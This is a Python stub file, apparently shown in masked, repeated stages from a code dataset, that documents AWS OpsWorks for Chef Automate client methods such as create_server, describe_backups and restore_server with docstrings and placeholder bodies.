customers: This field is optional. If you do not specify subnet IDs, your EC2 instances are created in a default subnet that is selected by Amazon EC2. If you specify subnet IDs, the VPC must have 'Auto Assign Public IP' enabled.\n For more information about supported Amazon EC2 platforms, see Supported Platforms .\n (string) --\n \n\n :type BackupId: string\n :param BackupId: If you specify this field, AWS OpsWorks for Chef Automate creates the server by using the backup represented by BackupId.\n\n :rtype: dict\n :return: {\n 'Server': {\n 'BackupRetentionCount': 123,\n 'ServerName': 'string',\n 'CreatedAt': datetime(2015, 1, 1),\n 'DisableAutomatedBackup': True|False,\n 'Endpoint': 'string',\n 'Engine': 'string',\n 'EngineModel': 'string',\n 'EngineAttributes': [\n {\n 'Name': 'string',\n 'Value': 'string'\n },\n ],\n 'EngineVersion': 'string',\n 'InstanceProfileArn': 'string',\n 'InstanceType': 'string',\n 'KeyPair': 'string',\n 'MaintenanceStatus': 'SUCCESS'|'FAILED',\n 'PreferredMaintenanceWindow': 'string',\n 'PreferredBackupWindow': 'string',\n 'SecurityGroupIds': [\n 'string',\n ],\n 'ServiceRoleArn': 'string',\n 'Status': 'BACKING_UP'|'CONNECTION_LOST'|'CREATING'|'DELETING'|'MODIFYING'|'FAILED'|'HEALTHY'|'RUNNING'|'SETUP'|'UNDER_MAINTENANCE'|'UNHEALTHY',\n 'StatusReason': 'string',\n 'SubnetIds': [\n 'string',\n ],\n 'ServerArn': 'string'\n }\n }\n \n \n :returns: \n CHEF_PIVOTAL_KEY : A base64-encoded RSA private key that is generated by AWS OpsWorks for Chef Automate. This private key is required to access the Chef API.\n CHEF_STARTER_KIT : A base64-encoded ZIP file. The ZIP file contains a Chef starter kit, which includes a README, a configuration file, and the required RSA private key. Save this file, unzip it, and then change to the directory where you've unzipped the file contents. From this directory, you can run Knife commands.\n \n \"\"\"\n pass\n\n\ndef delete_backup(BackupId=None):\n \"\"\"\n Deletes a backup. You can delete both manual and automated backups.\n This operation is asynchronous.\n A InvalidStateException is thrown then a backup is already deleting. A ResourceNotFoundException is thrown when the backup does not exist. A ValidationException is thrown when parameters of the request are not valid.\n See also: AWS API Documentation\n \n \n :example: response = client.delete_backup(\n BackupId='string'\n )\n \n \n :type BackupId: string\n :param BackupId: [REQUIRED]\n The ID of the backup to delete. Run the DescribeBackups command to get a list of backup IDs. Backup IDs are in the format ServerName-yyyyMMddHHmmssSSS .\n \n\n :rtype: dict\n :return: {}\n \n \n \"\"\"\n pass\n\n\ndef delete_server(ServerName=None):\n \"\"\"\n Deletes the server and the underlying AWS CloudFormation stack (including the server's EC2 instance). The server status updated to DELETING . Once the server is successfully deleted, it will no longer be returned by DescribeServer requests. If the AWS CloudFormation stack cannot be deleted, the server cannot be deleted.\n This operation is asynchronous.\n A InvalidStateException is thrown then a server is already deleting. A ResourceNotFoundException is thrown when the server does not exist. A ValidationException is raised when parameters of the request are invalid.\n See also: AWS API Documentation\n \n \n :example: response = client.delete_server(\n ServerName='string'\n )\n \n \n :type ServerName: string\n :param ServerName: [REQUIRED]\n The ID of the server to delete.\n \n\n :rtype: dict\n :return: {}\n \n \n \"\"\"\n pass\n\n\ndef describe_account_attributes():\n \"\"\"\n Describes your account attributes, and creates requests to increase limits before they are reached or exceeded.\n This operation is synchronous.\n See also: AWS API Documentation\n \n \n :example: response = client.describe_account_attributes()\n \n \n :rtype: dict\n :return: {\n 'Attributes': [\n {\n 'Name': 'string',\n 'Maximum': 123,\n 'Used': 123\n },\n ]\n }\n \n \n \"\"\"\n pass\n\n\ndef describe_backups(BackupId=None, ServerName=None, NextToken=None,\n MaxResults=None):\n \"\"\"\n Describes backups. The results are ordered by time, with newest backups first. If you do not specify a BackupId or ServerName, the command returns all backups.\n This operation is synchronous.\n A ResourceNotFoundException is thrown when the backup does not exist. A ValidationException is raised when parameters of the request are invalid.\n See also: AWS API Documentation\n \n \n :example: response = client.describe_backups(\n BackupId='string',\n ServerName='string',\n NextToken='string',\n MaxResults=123\n )\n \n \n :type BackupId: string\n :param BackupId: Describes a single backup.\n\n :type ServerName: string\n :param ServerName: Returns backups for the server with the specified ServerName.\n\n :type NextToken: string\n :param NextToken: NextToken is a string that is returned in some command responses. It indicates that not all entries have been returned, and that you must run at least one more request to get remaining items. To get remaining results, call DescribeBackups again, and assign the token from the previous results as the value of the nextToken parameter. If there are no more results, the response object's nextToken parameter value is null . Setting a nextToken value that was not returned in your previous results causes an InvalidNextTokenException to occur.\n\n :type MaxResults: integer\n :param MaxResults: To receive a paginated response, use this parameter to specify the maximum number of results to be returned with a single call. If the number of available results exceeds this maximum, the response includes a NextToken value that you can assign to the NextToken request parameter to get the next set of results.\n\n :rtype: dict\n :return: {\n 'Backups': [\n {\n 'BackupArn': 'string',\n 'BackupId': 'string',\n 'BackupType': 'AUTOMATED'|'MANUAL',\n 'CreatedAt': datetime(2015, 1, 1),\n 'Description': 'string',\n 'Engine': 'string',\n 'EngineModel': 'string',\n 'EngineVersion': 'string',\n 'InstanceProfileArn': 'string',\n 'InstanceType': 'string',\n 'KeyPair': 'string',\n 'PreferredBackupWindow': 'string',\n 'PreferredMaintenanceWindow': 'string',\n 'S3DataSize': 123,\n 'S3DataUrl': 'string',\n 'S3LogUrl': 'string',\n 'SecurityGroupIds': [\n 'string',\n ],\n 'ServerName': 'string',\n 'ServiceRoleArn': 'string',\n 'Status': 'IN_PROGRESS'|'OK'|'FAILED'|'DELETING',\n 'StatusDescription': 'string',\n 'SubnetIds': [\n 'string',\n ],\n 'ToolsVersion': 'string',\n 'UserArn': 'string'\n },\n ],\n 'NextToken': 'string'\n }\n \n \n :returns: \n (string) --\n \n \"\"\"\n pass\n\n\n<mask token>\n\n\ndef describe_node_association_status(NodeAssociationStatusToken=None,\n ServerName=None):\n \"\"\"\n See also: AWS API Documentation\n \n \n :example: response = client.describe_node_association_status(\n NodeAssociationStatusToken='string',\n ServerName='string'\n )\n \n \n :type NodeAssociationStatusToken: string\n :param NodeAssociationStatusToken: [REQUIRED]\n\n :type ServerName: string\n :param ServerName: [REQUIRED]\n\n :rtype: dict\n :return: {\n 'NodeAssociationStatus': 'SUCCESS'|'FAILED'|'IN_PROGRESS'\n }\n \n \n :returns: \n (dict) --\n NodeAssociationStatus (string) --\n \n \n \n \"\"\"\n pass\n\n\n<mask token>\n\n\ndef generate_presigned_url(ClientMethod=None, Params=None, ExpiresIn=None,\n HttpMethod=None):\n \"\"\"\n Generate a presigned url given a client, its method, and arguments\n \n :type ClientMethod: string\n :param ClientMethod: The client method to presign for\n\n :type Params: dict\n :param Params: The parameters normally passed to\n ClientMethod.\n\n :type ExpiresIn: int\n :param ExpiresIn: The number of seconds the presigned url is valid\n for. By default it expires in an hour (3600 seconds)\n\n :type HttpMethod: string\n :param HttpMethod: The http method to use on the generated url. By\n default, the http method is whatever is used in the method's model.\n\n \"\"\"\n pass\n\n\ndef get_paginator(operation_name=None):\n \"\"\"\n Create a paginator for an operation.\n \n :type operation_name: string\n :param operation_name: The operation name. This is the same name\n as the method name on the client. For example, if the\n method name is create_foo, and you'd normally invoke the\n operation as client.create_foo(**kwargs), if the\n create_foo operation can be paginated, you can use the\n call client.get_paginator('create_foo').\n\n :rtype: L{botocore.paginate.Paginator}\n \"\"\"\n pass\n\n\ndef get_waiter():\n \"\"\"\n \n \"\"\"\n pass\n\n\ndef restore_server(BackupId=None, ServerName=None, InstanceType=None,\n KeyPair=None):\n \"\"\"\n Restores a backup to a server that is in a RUNNING , FAILED , or HEALTHY state. When you run RestoreServer, the server's EC2 instance is deleted, and a new EC2 instance is configured. RestoreServer maintains the existing server endpoint, so configuration management of all of the server's client devices should continue to work.\n This operation is asynchronous.\n A InvalidStateException is thrown when the server is not in a valid state. A ResourceNotFoundException is thrown when the server does not exist. A ValidationException is raised when parameters of the request are invalid.\n See also: AWS API Documentation\n \n \n :example: response = client.restore_server(\n BackupId='string',\n ServerName='string',\n InstanceType='string',\n KeyPair='string'\n )\n \n \n :type BackupId: string\n :param BackupId: [REQUIRED]\n The ID of the backup that you want to use to restore a server.\n \n\n :type ServerName: string\n :param ServerName: [REQUIRED]\n The name of the server that you want to restore.\n \n\n :type InstanceType: string\n :param InstanceType: The type of the instance to create. Valid values must be specified in the following format: ^([cm][34]|t2).* For example, c3.large . If you do not specify this parameter, RestoreServer uses the instance type from the specified backup.\n\n :type KeyPair: string\n :param KeyPair: The name of the key pair to set on the new EC2 instance. This can be helpful if any of the administrators who manage the server no longer have the SSH key.\n\n :rtype: dict\n :return: {}\n \n \n :returns: \n (dict) --\n \n \"\"\"\n pass\n\n\n<mask token>\n", "step-3": "<mask token>\n\n\ndef associate_node(ServerName=None, NodeName=None, EngineAttributes=None):\n \"\"\"\n See also: AWS API Documentation\n \n \n :example: response = client.associate_node(\n ServerName='string',\n NodeName='string',\n EngineAttributes=[\n {\n 'Name': 'string',\n 'Value': 'string'\n },\n ]\n )\n \n \n :type ServerName: string\n :param ServerName: [REQUIRED]\n\n :type NodeName: string\n :param NodeName: [REQUIRED]\n\n :type EngineAttributes: list\n :param EngineAttributes: \n (dict) --A name/value pair that is specific to the engine of the server.\n Name (string) --The name of the engine attribute.\n Value (string) --The value of the engine attribute.\n \n \n\n :rtype: dict\n :return: {\n 'NodeAssociationStatusToken': 'string'\n }\n \n \n :returns: \n (dict) --\n NodeAssociationStatusToken (string) --\n \n \n \n \"\"\"\n pass\n\n\ndef can_paginate(operation_name=None):\n \"\"\"\n Check if an operation can be paginated.\n \n :type operation_name: string\n :param operation_name: The operation name. This is the same name\n as the method name on the client. For example, if the\n method name is create_foo, and you'd normally invoke the\n operation as client.create_foo(**kwargs), if the\n create_foo operation can be paginated, you can use the\n call client.get_paginator('create_foo').\n\n \"\"\"\n pass\n\n\ndef create_backup(ServerName=None, Description=None):\n \"\"\"\n Creates an application-level backup of a server. While the server is BACKING_UP , the server can not be modified and no additional backup can be created.\n Backups can be created for RUNNING , HEALTHY and UNHEALTHY servers.\n This operation is asnychronous.\n By default 50 manual backups can be created.\n A LimitExceededException is thrown then the maximum number of manual backup is reached. A InvalidStateException is thrown when the server is not in any of RUNNING, HEALTHY, UNHEALTHY. A ResourceNotFoundException is thrown when the server is not found. A ValidationException is thrown when parameters of the request are not valid.\n See also: AWS API Documentation\n \n \n :example: response = client.create_backup(\n ServerName='string',\n Description='string'\n )\n \n \n :type ServerName: string\n :param ServerName: [REQUIRED]\n The name of the server that you want to back up.\n \n\n :type Description: string\n :param Description: A user-defined description of the backup.\n\n :rtype: dict\n :return: {\n 'Backup': {\n 'BackupArn': 'string',\n 'BackupId': 'string',\n 'BackupType': 'AUTOMATED'|'MANUAL',\n 'CreatedAt': datetime(2015, 1, 1),\n 'Description': 'string',\n 'Engine': 'string',\n 'EngineModel': 'string',\n 'EngineVersion': 'string',\n 'InstanceProfileArn': 'string',\n 'InstanceType': 'string',\n 'KeyPair': 'string',\n 'PreferredBackupWindow': 'string',\n 'PreferredMaintenanceWindow': 'string',\n 'S3DataSize': 123,\n 'S3DataUrl': 'string',\n 'S3LogUrl': 'string',\n 'SecurityGroupIds': [\n 'string',\n ],\n 'ServerName': 'string',\n 'ServiceRoleArn': 'string',\n 'Status': 'IN_PROGRESS'|'OK'|'FAILED'|'DELETING',\n 'StatusDescription': 'string',\n 'SubnetIds': [\n 'string',\n ],\n 'ToolsVersion': 'string',\n 'UserArn': 'string'\n }\n }\n \n \n :returns: \n (string) --\n \n \"\"\"\n pass\n\n\ndef create_server(DisableAutomatedBackup=None, Engine=None, EngineModel=\n None, EngineVersion=None, EngineAttributes=None, BackupRetentionCount=\n None, ServerName=None, InstanceProfileArn=None, InstanceType=None,\n KeyPair=None, PreferredMaintenanceWindow=None, PreferredBackupWindow=\n None, SecurityGroupIds=None, ServiceRoleArn=None, SubnetIds=None,\n BackupId=None):\n \"\"\"\n Creates and immedately starts a new Server. The server can be used once it has reached the HEALTHY state.\n This operation is asnychronous.\n A LimitExceededException is thrown then the maximum number of server backup is reached. A ResourceAlreadyExistsException is raise when a server with the same name already exists in the account. A ResourceNotFoundException is thrown when a backupId is passed, but the backup does not exist. A ValidationException is thrown when parameters of the request are not valid.\n By default 10 servers can be created. A LimitExceededException is raised when the limit is exceeded.\n When no security groups are provided by using SecurityGroupIds , AWS OpsWorks creates a new security group. This security group opens the Chef server to the world on TCP port 443. If a KeyName is present, SSH access is enabled. SSH is also open to the world on TCP port 22.\n By default, the Chef Server is accessible from any IP address. We recommend that you update your security group rules to allow access from known IP addresses and address ranges only. To edit security group rules, open Security Groups in the navigation pane of the EC2 management console.\n See also: AWS API Documentation\n \n \n :example: response = client.create_server(\n DisableAutomatedBackup=True|False,\n Engine='string',\n EngineModel='string',\n EngineVersion='string',\n EngineAttributes=[\n {\n 'Name': 'string',\n 'Value': 'string'\n },\n ],\n BackupRetentionCount=123,\n ServerName='string',\n InstanceProfileArn='string',\n InstanceType='string',\n KeyPair='string',\n PreferredMaintenanceWindow='string',\n PreferredBackupWindow='string',\n SecurityGroupIds=[\n 'string',\n ],\n ServiceRoleArn='string',\n SubnetIds=[\n 'string',\n ],\n BackupId='string'\n )\n \n \n :type DisableAutomatedBackup: boolean\n :param DisableAutomatedBackup: Enable or disable scheduled backups. Valid values are true or false . The default value is true .\n\n :type Engine: string\n :param Engine: The configuration management engine to use. Valid values include Chef .\n\n :type EngineModel: string\n :param EngineModel: The engine model, or option. Valid values include Single .\n\n :type EngineVersion: string\n :param EngineVersion: The major release version of the engine that you want to use. Values depend on the engine that you choose.\n\n :type EngineAttributes: list\n :param EngineAttributes: Engine attributes on a specified server.\n Attributes accepted in a createServer request:\n CHEF_PIVOTAL_KEY : A base64-encoded RSA private key that is not stored by AWS OpsWorks for Chef Automate. This private key is required to access the Chef API.\n (dict) --A name/value pair that is specific to the engine of the server.\n Name (string) --The name of the engine attribute.\n Value (string) --The value of the engine attribute.\n \n \n\n :type BackupRetentionCount: integer\n :param BackupRetentionCount: The number of automated backups that you want to keep. Whenever a new backup is created, AWS OpsWorks for Chef Automate deletes the oldest backups if this number is exceeded. The default value is 1 .\n\n :type ServerName: string\n :param ServerName: [REQUIRED]\n The name of the server. The server name must be unique within your AWS account, within each region. Server names must start with a letter; then letters, numbers, or hyphens (-) are allowed, up to a maximum of 32 characters.\n \n\n :type InstanceProfileArn: string\n :param InstanceProfileArn: [REQUIRED]\n The ARN of the instance profile that your Amazon EC2 instances use. Although the AWS OpsWorks console typically creates the instance profile for you, in this release of AWS OpsWorks for Chef Automate, run the service-role-creation.yaml AWS CloudFormation template, located at https://s3.amazonaws.com/opsworks-stuff/latest/service-role-creation.yaml. This template creates a stack that includes the instance profile you need.\n \n\n :type InstanceType: string\n :param InstanceType: The Amazon EC2 instance type to use. Valid values must be specified in the following format: ^([cm][34]|t2).* For example, c3.large .\n\n :type KeyPair: string\n :param KeyPair: The Amazon EC2 key pair to set for the instance. You may specify this parameter to connect to your instances by using SSH.\n\n :type PreferredMaintenanceWindow: string\n :param PreferredMaintenanceWindow: The start time for a one-hour period each week during which AWS OpsWorks for Chef Automate performs maintenance on the instance. Valid values must be specified in the following format: DDD:HH:MM . The specified time is in coordinated universal time (UTC). The default value is a random one-hour period on Tuesday, Wednesday, or Friday. See TimeWindowDefinition for more information.\n Example: Mon:08:00 , which represents a start time of every Monday at 08:00 UTC. (8:00 a.m.)\n \n\n :type PreferredBackupWindow: string\n :param PreferredBackupWindow: The start time for a one-hour period during which AWS OpsWorks for Chef Automate backs up application-level data on your server if backups are enabled. Valid values must be specified in one of the following formats:\n HH:MM for daily backups\n DDD:HH:MM for weekly backups\n The specified time is in coordinated universal time (UTC). The default value is a random, daily start time.\n Example: 08:00 , which represents a daily start time of 08:00 UTC.Example: Mon:08:00 , which represents a start time of every Monday at 08:00 UTC. (8:00 a.m.)\n \n\n :type SecurityGroupIds: list\n :param SecurityGroupIds: A list of security group IDs to attach to the Amazon EC2 instance. If you add this parameter, the specified security groups must be within the VPC that is specified by SubnetIds .\n If you do not specify this parameter, AWS OpsWorks for Chef Automate creates one new security group that uses TCP ports 22 and 443, open to 0.0.0.0/0 (everyone).\n (string) --\n \n\n :type ServiceRoleArn: string\n :param ServiceRoleArn: [REQUIRED]\n The service role that the AWS OpsWorks for Chef Automate service backend uses to work with your account. Although the AWS OpsWorks console typically creates the service role for you, in this release of AWS OpsWorks for Chef Automate, run the service-role-creation.yaml AWS CloudFormation template, located at https://s3.amazonaws.com/opsworks-stuff/latest/service-role-creation.yaml. This template creates a stack that includes the service role that you need.\n \n\n :type SubnetIds: list\n :param SubnetIds: The IDs of subnets in which to launch the server EC2 instance.\n Amazon EC2-Classic customers: This field is required. All servers must run within a VPC. The VPC must have 'Auto Assign Public IP' enabled.\n EC2-VPC customers: This field is optional. If you do not specify subnet IDs, your EC2 instances are created in a default subnet that is selected by Amazon EC2. If you specify subnet IDs, the VPC must have 'Auto Assign Public IP' enabled.\n For more information about supported Amazon EC2 platforms, see Supported Platforms .\n (string) --\n \n\n :type BackupId: string\n :param BackupId: If you specify this field, AWS OpsWorks for Chef Automate creates the server by using the backup represented by BackupId.\n\n :rtype: dict\n :return: {\n 'Server': {\n 'BackupRetentionCount': 123,\n 'ServerName': 'string',\n 'CreatedAt': datetime(2015, 1, 1),\n 'DisableAutomatedBackup': True|False,\n 'Endpoint': 'string',\n 'Engine': 'string',\n 'EngineModel': 'string',\n 'EngineAttributes': [\n {\n 'Name': 'string',\n 'Value': 'string'\n },\n ],\n 'EngineVersion': 'string',\n 'InstanceProfileArn': 'string',\n 'InstanceType': 'string',\n 'KeyPair': 'string',\n 'MaintenanceStatus': 'SUCCESS'|'FAILED',\n 'PreferredMaintenanceWindow': 'string',\n 'PreferredBackupWindow': 'string',\n 'SecurityGroupIds': [\n 'string',\n ],\n 'ServiceRoleArn': 'string',\n 'Status': 'BACKING_UP'|'CONNECTION_LOST'|'CREATING'|'DELETING'|'MODIFYING'|'FAILED'|'HEALTHY'|'RUNNING'|'SETUP'|'UNDER_MAINTENANCE'|'UNHEALTHY',\n 'StatusReason': 'string',\n 'SubnetIds': [\n 'string',\n ],\n 'ServerArn': 'string'\n }\n }\n \n \n :returns: \n CHEF_PIVOTAL_KEY : A base64-encoded RSA private key that is generated by AWS OpsWorks for Chef Automate. This private key is required to access the Chef API.\n CHEF_STARTER_KIT : A base64-encoded ZIP file. The ZIP file contains a Chef starter kit, which includes a README, a configuration file, and the required RSA private key. Save this file, unzip it, and then change to the directory where you've unzipped the file contents. From this directory, you can run Knife commands.\n \n \"\"\"\n pass\n\n\ndef delete_backup(BackupId=None):\n \"\"\"\n Deletes a backup. You can delete both manual and automated backups.\n This operation is asynchronous.\n A InvalidStateException is thrown then a backup is already deleting. A ResourceNotFoundException is thrown when the backup does not exist. A ValidationException is thrown when parameters of the request are not valid.\n See also: AWS API Documentation\n \n \n :example: response = client.delete_backup(\n BackupId='string'\n )\n \n \n :type BackupId: string\n :param BackupId: [REQUIRED]\n The ID of the backup to delete. Run the DescribeBackups command to get a list of backup IDs. Backup IDs are in the format ServerName-yyyyMMddHHmmssSSS .\n \n\n :rtype: dict\n :return: {}\n \n \n \"\"\"\n pass\n\n\ndef delete_server(ServerName=None):\n \"\"\"\n Deletes the server and the underlying AWS CloudFormation stack (including the server's EC2 instance). The server status updated to DELETING . Once the server is successfully deleted, it will no longer be returned by DescribeServer requests. If the AWS CloudFormation stack cannot be deleted, the server cannot be deleted.\n This operation is asynchronous.\n A InvalidStateException is thrown then a server is already deleting. A ResourceNotFoundException is thrown when the server does not exist. A ValidationException is raised when parameters of the request are invalid.\n See also: AWS API Documentation\n \n \n :example: response = client.delete_server(\n ServerName='string'\n )\n \n \n :type ServerName: string\n :param ServerName: [REQUIRED]\n The ID of the server to delete.\n \n\n :rtype: dict\n :return: {}\n \n \n \"\"\"\n pass\n\n\ndef describe_account_attributes():\n \"\"\"\n Describes your account attributes, and creates requests to increase limits before they are reached or exceeded.\n This operation is synchronous.\n See also: AWS API Documentation\n \n \n :example: response = client.describe_account_attributes()\n \n \n :rtype: dict\n :return: {\n 'Attributes': [\n {\n 'Name': 'string',\n 'Maximum': 123,\n 'Used': 123\n },\n ]\n }\n \n \n \"\"\"\n pass\n\n\ndef describe_backups(BackupId=None, ServerName=None, NextToken=None,\n MaxResults=None):\n \"\"\"\n Describes backups. The results are ordered by time, with newest backups first. If you do not specify a BackupId or ServerName, the command returns all backups.\n This operation is synchronous.\n A ResourceNotFoundException is thrown when the backup does not exist. A ValidationException is raised when parameters of the request are invalid.\n See also: AWS API Documentation\n \n \n :example: response = client.describe_backups(\n BackupId='string',\n ServerName='string',\n NextToken='string',\n MaxResults=123\n )\n \n \n :type BackupId: string\n :param BackupId: Describes a single backup.\n\n :type ServerName: string\n :param ServerName: Returns backups for the server with the specified ServerName.\n\n :type NextToken: string\n :param NextToken: NextToken is a string that is returned in some command responses. It indicates that not all entries have been returned, and that you must run at least one more request to get remaining items. To get remaining results, call DescribeBackups again, and assign the token from the previous results as the value of the nextToken parameter. If there are no more results, the response object's nextToken parameter value is null . Setting a nextToken value that was not returned in your previous results causes an InvalidNextTokenException to occur.\n\n :type MaxResults: integer\n :param MaxResults: To receive a paginated response, use this parameter to specify the maximum number of results to be returned with a single call. If the number of available results exceeds this maximum, the response includes a NextToken value that you can assign to the NextToken request parameter to get the next set of results.\n\n :rtype: dict\n :return: {\n 'Backups': [\n {\n 'BackupArn': 'string',\n 'BackupId': 'string',\n 'BackupType': 'AUTOMATED'|'MANUAL',\n 'CreatedAt': datetime(2015, 1, 1),\n 'Description': 'string',\n 'Engine': 'string',\n 'EngineModel': 'string',\n 'EngineVersion': 'string',\n 'InstanceProfileArn': 'string',\n 'InstanceType': 'string',\n 'KeyPair': 'string',\n 'PreferredBackupWindow': 'string',\n 'PreferredMaintenanceWindow': 'string',\n 'S3DataSize': 123,\n 'S3DataUrl': 'string',\n 'S3LogUrl': 'string',\n 'SecurityGroupIds': [\n 'string',\n ],\n 'ServerName': 'string',\n 'ServiceRoleArn': 'string',\n 'Status': 'IN_PROGRESS'|'OK'|'FAILED'|'DELETING',\n 'StatusDescription': 'string',\n 'SubnetIds': [\n 'string',\n ],\n 'ToolsVersion': 'string',\n 'UserArn': 'string'\n },\n ],\n 'NextToken': 'string'\n }\n \n \n :returns: \n (string) --\n \n \"\"\"\n pass\n\n\n<mask token>\n\n\ndef describe_node_association_status(NodeAssociationStatusToken=None,\n ServerName=None):\n \"\"\"\n See also: AWS API Documentation\n \n \n :example: response = client.describe_node_association_status(\n NodeAssociationStatusToken='string',\n ServerName='string'\n )\n \n \n :type NodeAssociationStatusToken: string\n :param NodeAssociationStatusToken: [REQUIRED]\n\n :type ServerName: string\n :param ServerName: [REQUIRED]\n\n :rtype: dict\n :return: {\n 'NodeAssociationStatus': 'SUCCESS'|'FAILED'|'IN_PROGRESS'\n }\n \n \n :returns: \n (dict) --\n NodeAssociationStatus (string) --\n \n \n \n \"\"\"\n pass\n\n\n<mask token>\n\n\ndef disassociate_node(ServerName=None, NodeName=None, EngineAttributes=None):\n \"\"\"\n See also: AWS API Documentation\n \n \n :example: response = client.disassociate_node(\n ServerName='string',\n NodeName='string',\n EngineAttributes=[\n {\n 'Name': 'string',\n 'Value': 'string'\n },\n ]\n )\n \n \n :type ServerName: string\n :param ServerName: [REQUIRED]\n\n :type NodeName: string\n :param NodeName: [REQUIRED]\n\n :type EngineAttributes: list\n :param EngineAttributes: \n (dict) --A name/value pair that is specific to the engine of the server.\n Name (string) --The name of the engine attribute.\n Value (string) --The value of the engine attribute.\n \n \n\n :rtype: dict\n :return: {\n 'NodeAssociationStatusToken': 'string'\n }\n \n \n :returns: \n (dict) --\n NodeAssociationStatusToken (string) --\n \n \n \n \"\"\"\n pass\n\n\ndef generate_presigned_url(ClientMethod=None, Params=None, ExpiresIn=None,\n HttpMethod=None):\n \"\"\"\n Generate a presigned url given a client, its method, and arguments\n \n :type ClientMethod: string\n :param ClientMethod: The client method to presign for\n\n :type Params: dict\n :param Params: The parameters normally passed to\n ClientMethod.\n\n :type ExpiresIn: int\n :param ExpiresIn: The number of seconds the presigned url is valid\n for. By default it expires in an hour (3600 seconds)\n\n :type HttpMethod: string\n :param HttpMethod: The http method to use on the generated url. By\n default, the http method is whatever is used in the method's model.\n\n \"\"\"\n pass\n\n\ndef get_paginator(operation_name=None):\n \"\"\"\n Create a paginator for an operation.\n \n :type operation_name: string\n :param operation_name: The operation name. This is the same name\n as the method name on the client. For example, if the\n method name is create_foo, and you'd normally invoke the\n operation as client.create_foo(**kwargs), if the\n create_foo operation can be paginated, you can use the\n call client.get_paginator('create_foo').\n\n :rtype: L{botocore.paginate.Paginator}\n \"\"\"\n pass\n\n\ndef get_waiter():\n \"\"\"\n \n \"\"\"\n pass\n\n\ndef restore_server(BackupId=None, ServerName=None, InstanceType=None,\n KeyPair=None):\n \"\"\"\n Restores a backup to a server that is in a RUNNING , FAILED , or HEALTHY state. When you run RestoreServer, the server's EC2 instance is deleted, and a new EC2 instance is configured. RestoreServer maintains the existing server endpoint, so configuration management of all of the server's client devices should continue to work.\n This operation is asynchronous.\n A InvalidStateException is thrown when the server is not in a valid state. A ResourceNotFoundException is thrown when the server does not exist. A ValidationException is raised when parameters of the request are invalid.\n See also: AWS API Documentation\n \n \n :example: response = client.restore_server(\n BackupId='string',\n ServerName='string',\n InstanceType='string',\n KeyPair='string'\n )\n \n \n :type BackupId: string\n :param BackupId: [REQUIRED]\n The ID of the backup that you want to use to restore a server.\n \n\n :type ServerName: string\n :param ServerName: [REQUIRED]\n The name of the server that you want to restore.\n \n\n :type InstanceType: string\n :param InstanceType: The type of the instance to create. Valid values must be specified in the following format: ^([cm][34]|t2).* For example, c3.large . If you do not specify this parameter, RestoreServer uses the instance type from the specified backup.\n\n :type KeyPair: string\n :param KeyPair: The name of the key pair to set on the new EC2 instance. This can be helpful if any of the administrators who manage the server no longer have the SSH key.\n\n :rtype: dict\n :return: {}\n \n \n :returns: \n (dict) --\n \n \"\"\"\n pass\n\n\n<mask token>\n\n\ndef update_server(DisableAutomatedBackup=None, BackupRetentionCount=None,\n ServerName=None, PreferredMaintenanceWindow=None, PreferredBackupWindow\n =None):\n \"\"\"\n Updates settings for a server.\n This operation is synchronous.\n See also: AWS API Documentation\n \n \n :example: response = client.update_server(\n DisableAutomatedBackup=True|False,\n BackupRetentionCount=123,\n ServerName='string',\n PreferredMaintenanceWindow='string',\n PreferredBackupWindow='string'\n )\n \n \n :type DisableAutomatedBackup: boolean\n :param DisableAutomatedBackup: Setting DisableAutomatedBackup to true disables automated or scheduled backups. Automated backups are enabled by default.\n\n :type BackupRetentionCount: integer\n :param BackupRetentionCount: Sets the number of automated backups that you want to keep.\n\n :type ServerName: string\n :param ServerName: [REQUIRED]\n The name of the server to update.\n \n\n :type PreferredMaintenanceWindow: string\n :param PreferredMaintenanceWindow: \n DDD:HH:MM (weekly start time) or HH:MM (daily start time).\n Time windows always use coordinated universal time (UTC).\n Valid strings for day of week (DDD ) are: Mon, Tue, Wed, Thr, Fri, Sat, Sun.\n \n\n :type PreferredBackupWindow: string\n :param PreferredBackupWindow: \n DDD:HH:MM (weekly start time) or HH:MM (daily start time).\n Time windows always use coordinated universal time (UTC).\n Valid strings for day of week (DDD ) are: Mon, Tue, Wed, Thr, Fri, Sat, Sun.\n \n\n :rtype: dict\n :return: {\n 'Server': {\n 'BackupRetentionCount': 123,\n 'ServerName': 'string',\n 'CreatedAt': datetime(2015, 1, 1),\n 'DisableAutomatedBackup': True|False,\n 'Endpoint': 'string',\n 'Engine': 'string',\n 'EngineModel': 'string',\n 'EngineAttributes': [\n {\n 'Name': 'string',\n 'Value': 'string'\n },\n ],\n 'EngineVersion': 'string',\n 'InstanceProfileArn': 'string',\n 'InstanceType': 'string',\n 'KeyPair': 'string',\n 'MaintenanceStatus': 'SUCCESS'|'FAILED',\n 'PreferredMaintenanceWindow': 'string',\n 'PreferredBackupWindow': 'string',\n 'SecurityGroupIds': [\n 'string',\n ],\n 'ServiceRoleArn': 'string',\n 'Status': 'BACKING_UP'|'CONNECTION_LOST'|'CREATING'|'DELETING'|'MODIFYING'|'FAILED'|'HEALTHY'|'RUNNING'|'SETUP'|'UNDER_MAINTENANCE'|'UNHEALTHY',\n 'StatusReason': 'string',\n 'SubnetIds': [\n 'string',\n ],\n 'ServerArn': 'string'\n }\n }\n \n \n :returns: \n CHEF_PIVOTAL_KEY : A base64-encoded RSA private key that is generated by AWS OpsWorks for Chef Automate. This private key is required to access the Chef API.\n CHEF_STARTER_KIT : A base64-encoded ZIP file. The ZIP file contains a Chef starter kit, which includes a README, a configuration file, and the required RSA private key. Save this file, unzip it, and then change to the directory where you've unzipped the file contents. From this directory, you can run Knife commands.\n \n \"\"\"\n pass\n\n\ndef update_server_engine_attributes(ServerName=None, AttributeName=None,\n AttributeValue=None):\n \"\"\"\n Updates engine specific attributes on a specified server. Server will enter the MODIFYING state when this operation is in progress. Only one update can take place at a time.\n This operation can be use to reset Chef Server main API key (CHEF_PIVOTAL_KEY ).\n This operation is asynchronous.\n This operation can only be called for HEALTHY and UNHEALTHY servers. Otherwise a InvalidStateException is raised. A ResourceNotFoundException is thrown when the server does not exist. A ValidationException is raised when parameters of the request are invalid.\n See also: AWS API Documentation\n \n \n :example: response = client.update_server_engine_attributes(\n ServerName='string',\n AttributeName='string',\n AttributeValue='string'\n )\n \n \n :type ServerName: string\n :param ServerName: [REQUIRED]\n The name of the server to update.\n \n\n :type AttributeName: string\n :param AttributeName: [REQUIRED]\n The name of the engine attribute to update.\n \n\n :type AttributeValue: string\n :param AttributeValue: The value to set for the attribute.\n\n :rtype: dict\n :return: {\n 'Server': {\n 'BackupRetentionCount': 123,\n 'ServerName': 'string',\n 'CreatedAt': datetime(2015, 